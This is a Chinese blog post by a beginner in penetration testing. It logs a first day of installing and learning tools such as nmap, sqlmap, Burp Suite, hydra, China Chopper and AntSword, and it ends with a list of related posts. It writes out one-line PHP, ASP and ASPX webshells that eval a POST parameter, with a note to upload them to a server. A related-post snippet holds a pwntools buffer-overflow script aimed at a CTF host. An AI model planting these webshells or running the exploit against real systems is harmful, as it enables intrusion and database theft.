drops第一天 工具安装

最新推荐文章于 2022-10-16 14:58:25 发布
最新推荐文章于 2022-10-16 14:58:25 发布
阅读量285 收藏
点赞数 1
分类专栏: drops 文章标签: 渗透测试 小白
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43480081/article/details/96479706
版权

今天新接触了许多软件,还有功能强大的虚拟机。
虚拟机安装了全新的Linux系统
1.nmap
nmap可以实现:主机发现,端口扫描,版本侦测,操作系统侦测等功能
nmap的常用参数如上表
2.sqlmap
用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
sqlmap的参数
3.Burpsuite
用于攻击web应用程序的集成平台,包含了许多工具
打开火狐浏览器的FoxyProxy插件,Burpsuite上打开intercept is on进行抓包
在这里插入图片描述
4.hydra
功能强大的暴力破解工具
kali虚拟机上自带
hydra的参数
5.中国菜刀
一句话木马,短短一行代码,就能实现和大马相当的功能
PHP:
<?php @eval($_POST['pass']);?>
ASP:
<%eval request(“pass”)%>
ASPX:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
上传至服务器,用中国蚁剑或中国菜刀来获取数据库
6.中国蚁剑
与中国菜刀类似,功能更强大。连接后可以拥有类似CMD的高级权限
7.御剑
好用的网站网站后台扫描工具
使用界面
8.Nessus
漏洞扫描程序
在这里插入图片描述
在这里插入图片描述
9.AWVS
自动化的web应用程序安全测试工具
在这里插入图片描述在这里插入图片描述
10.Appscan
一款好用且功能强大的Web安全测试工具
在这里插入图片描述在这里插入图片描述

你的小粉丝
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
webshell管理之中国菜刀 蚁剑 WeBaCoo Weevely
马赛克的博客
12-30 1万+
一:中国菜刀 中国菜刀是一款国产的网站管理软件,直接php,asp,aspx等脚本语言,简单来说通过菜刀连接上传到网站的一句话木马,可以控制 部分甚至全部权限,现在很多菜刀都有后门,小心使用。 一般情况下,可能会被IDS,WAF,等扫描软件查杀,可以通过各种编码去绕过 二:蚁剑 蚁剑是开源的跨平台的网站管理工具,中文手册链接:https://doc.u0u.us/zh-hans/gett...
中国蚁剑(AntSword)—— 中国菜刀的替代品
xnightmare的博客
08-04 1万+
中国菜刀是一款经典的WebShell管理工具,但是早已经停止维护,在网络上难以找到官方版本,即使找到官方最后版本,也存在一些bug。可以使用中国蚁剑(AntSword)替代中国菜刀。 中国蚁剑的特点主要有如下几点: 支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。 完善的文档。中国蚁剑文档地址。 多项功能。文件管理功能、虚拟终端功能、数据库管理功能。 内置代理功能。支持HTTP、HTTPS
STATA基础操作-删除
热门推荐
weixin_43210417的博客
03-09 9万+
一、删除变量 1.clear all /删除所有变量 2.drop var1 var2//删除某几个变量 3.drop _all //删除所有的变量和观测值 二、删除观测值 1.删除缺失值 1.drop if var1==. // 删除var1的缺失值对应的行 2.missings dropobs var1,force // 同上-missings需先安装 3.missings dropobs //删除所有变量均为缺失值的行 4.dropmiss, obs any // 删除所有缺失值的行 2.删除
Stata常用命令示例
大太阳的博客
09-03 1万+
目录 1.数据描述 2. 标签重命名 1.数据描述 describe # 简写des 2. 标签重命名 rename 原始标签名称 新标签名称 # 例如rename Stkcd id 3.数据统计 summarize #简写sum
(48.2)【WAF绕过-权限控制工具】菜刀、蚁剑、冰蝎 下载、使用方法
05-19 2615
【后门工具
乌云文章Drops离线版打包大全
08-02
【乌云文章Drops离线版打包大全】是一款集合了大量信息安全相关文章的资源包,主要涵盖的是“乌云”平台上的Drops模块内容。乌云,全称为“WooYun”,是一个专注于互联网安全问题反馈与分享的平台,自2010年成立以来...
GA_Ten_Drops.rar_ten drops_十滴水_智能滴水算法
09-14
本资料包“GA_Ten_Drops.rar”正是以此为背景,探讨如何运用遗传算法解决“十滴水”问题,这是一个经典的策略游戏,也常被用作算法设计的实践案例。 “十滴水”游戏的目标是使一定数量的水滴(通常为十滴)在有限的...
模拟退火.rar_drops2l_模拟退火
07-15
模拟退火算法 MATLAB 数学建模会用到的 如果解决实际问题,其实还需要自己修改其中的子函数 M文件
Cloud Drops-开源
05-02
有了这个程序,您可以在您的保管箱帐户中找到您的Mp3文件,并通过流在设备上播放它们。 您无需将歌曲下载到设备上,因此不必担心空间。 在运行4.0及更高版本的Android上运行
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
最新发布
m0_73734159的博客
10-16 2012
关于中国蚁剑和中国菜刀安装过程中的问题总结和解决方法
向中国菜刀致敬!中国蚁剑
血色苍穹
11-02 3819
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员已近进行常规操作的网站管理员。 任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任! Windows安装蚁剑 中国蚁剑从V2.0.0-beta版本开始,引入了加载器。用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编译/执行/调试等...
STL 习题
weixin_43763903的博客
03-23 473
sort 题目描述: STL库中有许多非常实用的函数,如sort,set,map,vector,queue等。 此题为sort的应用教学,题目如下: 读入n条学生成绩记录,包括学生姓名,总成绩,语文,数学和英语成绩,要求按总成绩从高到低输出n条记录,每条记录占一行。总成绩相同时按语文成绩从高到低输出,语文成绩相同时按数学成绩从高到低输出。(没有两个人的成绩完全一样) 输入: 第一行读入一个...
xctf攻防世界pwn level0
你的小粉丝的博客
07-24 1469
答主也是个小白,学长告诉我要用脚本,我也不会写,用的别人写好的脚本 from pwn import * p= remote(‘111.198.29.45’,33907) elf=ELF(’./level0’) sysaddr=elf.symbols[‘callsystem’] payload=‘a’*(0x80+8)?+p64(sysaddr) p.recv() p.send(payload) p...
bugkuCTFweb字符?正则?
你的小粉丝的博客
07-29 1441
这道题打开后是一个网页 找到其中的正则表达式: /key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/ 解题 先来基本的知识储备 按照学长的方法,将正则表达式进行拆分 key .* key .{4,7} key: / . / (.*key) [a-z] [[:punct:]] key就是普通的字符 .是除了换行的任意字符,假设就是a *匹配0或多个正则...
bugku杂项之普通的二维码
你的小粉丝的博客
07-19 1263
题目给了一个zip压缩包,解压后发现是一个二维码 想着二维码可能会有些提示,用手机扫码后得到如下信息 一看这就不是什么正儿八经的flag 果断转换思路 用HxD打开这个图片,查看十六进制 开头如下: 没有什么发现 再看看结尾: 想到了十六进制数转换十进制数 经过初次尝试,128位的十六进制数直接转换肯定有问题 常规思路按每两位数字截一下,再去转换,发现转换成的十进制数还是太小,十进制数对应的ASC...
sqli-labs-master第一关sql注入
你的小粉丝的博客
07-25 1244
先了解一下数据库 先登录账户,输入密码 之后可以看到N个数据库 打开数据库可以看到N个表 每个表里还有N个字段 除了用sql语句查看,当然也可以用MySQL等直接查看 开始步入正题 sql注入 url处先尝试着输入?id=1; 再尝试?id=2; ...
BIRT中文安装教程与开发环境设置
本文档主要介绍了如何在中文环境下安装和配置BIRT(Business Intelligence and Reporting Tools),一种基于Eclipse的开源报表工具。文章提供了两种安装方式: 1. **BIRT All-in-one Eclipse安装法**: - 为了简化...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值